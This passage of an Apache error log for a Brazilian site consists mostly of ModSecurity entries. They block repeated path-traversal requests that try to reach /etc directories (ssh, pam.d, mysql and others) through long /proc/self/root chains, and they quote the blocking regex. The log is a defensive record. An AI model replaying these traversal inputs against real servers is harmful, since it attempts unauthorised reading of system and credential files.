"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm80AeiSKl8TjouI-YtAwAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:42:59.188406 2026] [:error] [pid 19507:tid 140411691570944] [client 216.73.216.191:61110] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm809Y0UrI5A3LftIwSwQAAAYY"]
[Tue Mar 17 17:42:59.774407 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:50178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm809Y0UrI5A3LftIwSxAAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:01.312906 2026] [:error] [pid 31803:tid 140411666392832] [client 216.73.216.191:42309] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm81eyqAr6etmhZHNo8bAAAAEk"]
[Tue Mar 17 17:43:03.813489 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.241.31:50190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm819Y0UrI5A3LftIwSyAAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:08.547988 2026] [:error] [pid 2473:tid 140411616036608] [client 216.73.216.191:53945] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm83KBJNF7axNlVR0Ut3gAAAA8"]
[Tue Mar 17 17:43:10.033888 2026] [proxy_fcgi:error] [pid 7004:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47290] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:43:11.813073 2026] [:error] [pid 19507:tid 140411574073088] [client 216.73.216.191:46644] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm839Y0UrI5A3LftIwSywAAAZQ"]
[Tue Mar 17 17:43:12.146751 2026] [:error] [pid 29151:tid 140411641214720] [client 74.7.241.31:41112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm84PPqhzTj3BvfDX-cugAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:15.157376 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.31:41116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm846BJNF7axNlVR0Ut4gAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:15.361079 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.241.31:41116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm846BJNF7axNlVR0Ut4wAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:17.335020 2026] [:error] [pid 7437:tid 140411674785536] [client 74.7.241.31:36226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm85QeiSKl8TjouI-YtCQAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:18.739889 2026] [:error] [pid 29151:tid 140411582465792] [client 74.7.241.31:36230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm85vPqhzTj3BvfDX-cvgAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:21.654284 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.241.31:36242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm86aBJNF7axNlVR0Ut5QAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:23.102885 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:36250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm869a6ubjKNq_cu4YdAgAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:25.295001 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.241.31:36264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm87Rj0p0SRWAqcjGGPaQAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:27.798843 2026] [:error] [pid 7437:tid 140411699963648] [client 216.73.216.191:34711] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm87weiSKl8TjouI-YtDAAAA8U"]
[Tue Mar 17 17:43:35.901260 2026] [:error] [pid 7437:tid 140411574073088] [client 74.7.241.31:58520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm89weiSKl8TjouI-YtDgAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:38.048924 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:47260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8-tY0UrI5A3LftIwS0QAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:38.121781 2026] [proxy_fcgi:error] [pid 2598:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47606] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:43:38.266923 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:47260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8-tY0UrI5A3LftIwS0wAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:40.237222 2026] [core:alert] [pid 31803:tid 140411683178240] [client 74.7.241.31:47262] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:40.718672 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.241.31:47274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8_MU6Sx0TG1YjmQjD1QAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:43.693507 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.241.31:47286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm8_weiSKl8TjouI-YtEQAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:43:58.188365 2026] [:error] [pid 26799:tid 140411716749056] [client 216.73.216.191:51684] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm9Dta6ubjKNq_cu4YdCAAAA0M"]
[Tue Mar 17 17:44:09.053818 2026] [proxy_fcgi:error] [pid 25836:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47970] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:44:17.235196 2026] [:error] [pid 7004:tid 140411565680384] [client 216.73.216.191:30707] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm9IcU6Sx0TG1YjmQjD6gAAApU"]
[Tue Mar 17 17:44:31.029852 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48208] AH01075: Error dispatching request to : (polling)
